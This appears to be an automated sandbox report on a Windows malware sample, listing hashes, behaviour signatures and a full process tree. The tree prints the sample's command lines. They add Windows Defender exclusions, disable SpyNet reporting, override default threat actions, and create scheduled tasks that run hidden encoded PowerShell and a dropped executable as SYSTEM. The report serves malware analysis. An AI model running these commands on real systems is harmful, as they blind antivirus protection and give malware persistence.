Analysis

  • max time kernel
    90s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-10-2022 10:47

General

  • Target

    file.exe

  • Size

    7.3MB

  • MD5

    5164bbe879fcec47b89953a252fce692

  • SHA1

    286c9f91bf8a99cc7714dcccef3b7d666da14318

  • SHA256

    4e38bf2b65ef2527c628f54e32aec850b0b4c33d61840dc9b8752282d069d338

  • SHA512

    2b942ab2328d00ccda3d9d31a678503a5310243cf2fdec07558d3e7903fe6ad770b0b351c451fc6e9c5813994422b9c4a796d31aac55f00f87c31bbc8778ee02

  • SSDEEP

    196608:91O3kAwXLkTqGjp4kAFYyQLmTlU59JdpH0c1:3O3kAw7uKzFLQLylUbtN1

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 31 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 40 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2160
    • C:\Users\Admin\AppData\Local\Temp\7zSA974.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4764
      • C:\Users\Admin\AppData\Local\Temp\7zSAE07.tmp\Install.exe
        .\Install.exe /S /site_id "525403"
        3⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Checks computer location settings
        • Drops file in System32 directory
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:3568
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4560
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4972
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
                PID:2296
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                6⤵
                  PID:4616
            • C:\Windows\SysWOW64\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3168
              • C:\Windows\SysWOW64\cmd.exe
                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:440
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                  6⤵
                    PID:5076
                  • \??\c:\windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                    6⤵
                      PID:912
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "gGkZsnjkj" /SC once /ST 05:54:44 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                  4⤵
                  • Creates scheduled task(s)
                  PID:4944
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /run /I /tn "gGkZsnjkj"
                  4⤵
                    PID:2872
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /DELETE /F /TN "gGkZsnjkj"
                    4⤵
                      PID:3564
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /CREATE /TN "bKcODTUCyUvoWvuOBb" /SC once /ST 10:48:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JPYWILqPnlXqPFjOR\KPaUieawoGhgiPB\LLuMqrw.exe\" ra /site_id 525403 /S" /V1 /F
                      4⤵
                      • Drops file in Windows directory
                      • Creates scheduled task(s)
                      PID:3612
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                1⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:5056
                • C:\Windows\system32\gpupdate.exe
                  "C:\Windows\system32\gpupdate.exe" /force
                  2⤵
                    PID:1944
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                  1⤵
                    PID:2084
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                    1⤵
                      PID:3332
                    • C:\Windows\system32\gpscript.exe
                      gpscript.exe /RefreshSystemParam
                      1⤵
                        PID:2064
                      • C:\Users\Admin\AppData\Local\Temp\JPYWILqPnlXqPFjOR\KPaUieawoGhgiPB\LLuMqrw.exe
                        C:\Users\Admin\AppData\Local\Temp\JPYWILqPnlXqPFjOR\KPaUieawoGhgiPB\LLuMqrw.exe ra /site_id 525403 /S
                        1⤵
                        • Executes dropped EXE
                        • Drops file in System32 directory
                        • Suspicious use of WriteProcessMemory
                        PID:4236
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                          2⤵
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:2396
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                            3⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4812
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                              4⤵
                                PID:4172
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                              3⤵
                                PID:1344
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                3⤵
                                  PID:1748
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                  3⤵
                                    PID:2116
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                    3⤵
                                      PID:1976
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                      3⤵
                                        PID:4980
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                        3⤵
                                          PID:4708
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                          3⤵
                                            PID:3472
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                            3⤵
                                              PID:4972
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                              3⤵
                                                PID:4984
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                3⤵
                                                  PID:2012
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                  3⤵
                                                    PID:4560
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                    3⤵
                                                      PID:1956
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                      3⤵
                                                        PID:4308
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                        3⤵
                                                          PID:3168
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                          3⤵
                                                            PID:4676
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                            3⤵
                                                              PID:1204
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                              3⤵
                                                                PID:1160
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                3⤵
                                                                  PID:852
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                  3⤵
                                                                    PID:4944
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                    3⤵
                                                                      PID:1324
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                      3⤵
                                                                        PID:4132
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                        3⤵
                                                                          PID:3272
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                          3⤵
                                                                            PID:2872
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DyLrXeBYgDUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DyLrXeBYgDUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KlxBVdQvPHUU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KlxBVdQvPHUU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mATVtTtwRBfYoVEuAWR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mATVtTtwRBfYoVEuAWR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\prTKcPnPU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\prTKcPnPU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wfePzGzbIQGEC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wfePzGzbIQGEC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\kLiGIkXWiwtEPvVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\kLiGIkXWiwtEPvVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JPYWILqPnlXqPFjOR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JPYWILqPnlXqPFjOR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\EpsxxpNsmYaigCcr\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\EpsxxpNsmYaigCcr\" /t REG_DWORD /d 0 /reg:64;"
                                                                          2⤵
                                                                          • Drops file in System32 directory
                                                                          • Modifies data under HKEY_USERS
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:960
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DyLrXeBYgDUn" /t REG_DWORD /d 0 /reg:32
                                                                            3⤵
                                                                              PID:3648
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DyLrXeBYgDUn" /t REG_DWORD /d 0 /reg:32
                                                                                4⤵
                                                                                  PID:2344
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DyLrXeBYgDUn" /t REG_DWORD /d 0 /reg:64
                                                                                3⤵
                                                                                  PID:4020
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KlxBVdQvPHUU2" /t REG_DWORD /d 0 /reg:32
                                                                                  3⤵
                                                                                    PID:2928
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KlxBVdQvPHUU2" /t REG_DWORD /d 0 /reg:64
                                                                                    3⤵
                                                                                      PID:1936
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mATVtTtwRBfYoVEuAWR" /t REG_DWORD /d 0 /reg:32
                                                                                      3⤵
                                                                                        PID:1164
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mATVtTtwRBfYoVEuAWR" /t REG_DWORD /d 0 /reg:64
                                                                                        3⤵
                                                                                          PID:1848
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\prTKcPnPU" /t REG_DWORD /d 0 /reg:32
                                                                                          3⤵
                                                                                            PID:4368
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\prTKcPnPU" /t REG_DWORD /d 0 /reg:64
                                                                                            3⤵
                                                                                              PID:2880
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wfePzGzbIQGEC" /t REG_DWORD /d 0 /reg:32
                                                                                              3⤵
                                                                                                PID:4124
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wfePzGzbIQGEC" /t REG_DWORD /d 0 /reg:64
                                                                                                3⤵
                                                                                                  PID:3908
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\kLiGIkXWiwtEPvVB /t REG_DWORD /d 0 /reg:32
                                                                                                  3⤵
                                                                                                    PID:2440
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\kLiGIkXWiwtEPvVB /t REG_DWORD /d 0 /reg:64
                                                                                                    3⤵
                                                                                                      PID:1944
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JPYWILqPnlXqPFjOR /t REG_DWORD /d 0 /reg:32
                                                                                                      3⤵
                                                                                                        PID:2248
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JPYWILqPnlXqPFjOR /t REG_DWORD /d 0 /reg:64
                                                                                                        3⤵
                                                                                                          PID:1776
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\EpsxxpNsmYaigCcr /t REG_DWORD /d 0 /reg:32
                                                                                                          3⤵
                                                                                                            PID:1568
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\EpsxxpNsmYaigCcr /t REG_DWORD /d 0 /reg:64
                                                                                                            3⤵
                                                                                                              PID:4428
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                            schtasks /CREATE /TN "gbUoPMylo" /SC once /ST 00:45:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                            2⤵
                                                                                                            • Creates scheduled task(s)
                                                                                                            PID:968
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                            schtasks /run /I /tn "gbUoPMylo"
                                                                                                            2⤵
